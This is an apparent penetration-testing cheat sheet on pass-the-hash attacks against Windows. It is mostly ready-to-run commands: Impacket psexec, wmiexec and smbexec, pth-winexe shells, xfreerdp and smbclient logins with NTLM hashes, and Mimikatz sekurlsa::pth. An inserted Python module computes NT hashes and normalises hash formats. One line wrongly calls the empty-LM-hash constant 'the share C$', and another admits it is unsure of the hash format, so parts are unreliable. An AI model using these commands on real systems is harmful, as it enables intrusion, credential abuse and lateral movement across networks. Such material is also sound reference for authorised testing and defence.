Pass the hash (PtH) allows an attacker to authenticate to a remote server or service with the NTLM or LanMan hash of a user's password instead of the plaintext password that is normally required. Stealing the hash is enough: it is used directly to authenticate, so the plaintext password never has to be recovered.
See Evil-WinRM if port 5985 is open.
## Impacket

```bash
# $DOMAIN, $IP and $DC_IP are assumed to be set already
USER=Administrator
HASH=<LM hash>:<NTLM hash>   # Impacket's -hashes takes the form LMHASH:NTHASH
impacket-psexec -dc-ip $DC_IP -hashes ${HASH} ${DOMAIN}/${USER}@${IP}
impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes ${HASH}
```
## Passing-The-Hash toolkit

Already installed in Kali Linux.

- Official Documentation (GitHub)

### Help

Available tools: winexe, wmic, wmis, rpcclient, smbclient, smbget, net

```bash
pth-winexe
```

### Examples

```bash
pth-net rpc info -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IP
pth-net rpc user -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IP
pth-net rpc group -U 'example.com/john%00000000000000000000000000000000:<NTLM hash>' -S $IP
pth-net status sessions -U 'example.com/<username>%00000000000000000000000000000000:<NTLM hash>' -S $IP
```
## Pass-the-Hash – SMB Share

aad3b435b51404eeaad3b435b51404ee is the share C$ in UNC format.

```bash
pth-winexe -U <username>%<smb share (md5)>:<NTLM hash> //$IP cmd
pth-winexe -U domain/username%aad3b435b51404eeaad3b435b51404ee:<NTLM hash> //$IP cmd
```
## Impacket scripts

Not sure, hash is usually LM:NTLM… to validate.

```bash
# In this section $HASH holds the NT hash only; the LM half is supplied inline
impacket-wmiexec ${DOMAIN}/${USER}@${IP} -hashes aad3b435b51404eeaad3b435b51404ee:${HASH}
```

Get a semi-interactive shell:

```bash
impacket-smbexec -hashes :${HASH} ${DOMAIN}/${USER}@${IP}
```
## RDP

See Pass-the-Hash in Windows 10 (SANS) and Alternative ways to Pass the Hash (PtH) for more details on restrictions.

Use the NTLM hash, not LM:NTLM!

```bash
xfreerdp /cert:ignore /v:${IP} /u:${USER} /pth:${NTLM_HASH}
```
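The sections above disagree about whether `$HASH` holds `LM:NTLM` or only the NT hash, and the RDP note stresses that xfreerdp wants the NT hash alone. The following Python module, added here as an illustration and not part of the original page or any of the tools it lists, shows what the NT hash actually is (MD4 over the UTF-16LE password, which is why possessing it is equivalent to possessing the password) and normalises the three hash spellings seen on this page (`LM:NT`, `:NT`, bare `NT`) into a validated `(lm, nt)` pair. The MD4 routine is written out because hashlib's `md4` is frequently unavailable under OpenSSL 3; the fixed LM value `aad3b435b51404eeaad3b435b51404ee` is treated as the placeholder for an absent LM hash, which is how Impacket prints accounts that have none. Function names and the `EMPTY_LM_HASH` constant are this example's own.

```python
import struct
from typing import Tuple

# LM half that Impacket prints, and this page uses, for accounts without an LM hash
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def _md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320), used because hashlib's md4 is often disabled."""
    mask = 0xFFFFFFFF

    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # Pad: 0x80, zeros to 56 mod 64, then the bit length as 64-bit little-endian
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: words in order, shifts 3/7/11/19
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,..., shifts 3/5/9/13
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: fixed word order, shifts 3/9/11/15
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as 32 lowercase hex characters."""
    return _md4(password.encode("utf-16-le")).hex()


def parse_hash_argument(value: str) -> Tuple[str, str]:
    """Accept 'LM:NT', ':NT' or a bare 'NT' and return (lm, nt) in lowercase hex.

    A missing or empty LM half is replaced by EMPTY_LM_HASH so the result can
    always be rendered as LM:NT for tools that require both halves.
    """
    value = value.strip()
    lm, nt = value.split(":", 1) if ":" in value else ("", value)
    lm, nt = lm.lower() or EMPTY_LM_HASH, nt.lower()
    for name, part in (("LM", lm), ("NT", nt)):
        if len(part) != 32 or any(ch not in "0123456789abcdef" for ch in part):
            raise ValueError(f"{name} hash must be 32 hex characters, got {part!r}")
    return lm, nt


def as_lm_nt(value: str) -> str:
    """'LM:NT' spelling, the form Impacket's -hashes expects."""
    return ":".join(parse_hash_argument(value))


def as_nt_only(value: str) -> str:
    """Bare NT hash, the form xfreerdp /pth and smbclient --pw-nt-hash expect."""
    return parse_hash_argument(value)[1]


if __name__ == "__main__":
    # Constructed demonstration values; the empty-password NT hash is a well-known constant
    print(nt_hash(""))            # 31d6cfe0d16ae931b73c59d7e0c089c0
    print(as_lm_nt(nt_hash("password")))
```

Because the NT hash is an unsalted, deterministic function of the password, any two accounts sharing a password share a hash, and a captured hash stays valid until the password changes; that is the property the whole page relies on and the reason rotating credentials after a compromise is the only real remediation.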
## SMB

See smbclient.

```bash
# With --pw-nt-hash, the value in the password position is the NT hash
smbclient //${IP}/myshare -U $USER --pw-nt-hash $HASH -W $DOMAIN
```
## Mimikatz

See Lateral Movement: Pass the Hash Attack.

```
mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38
```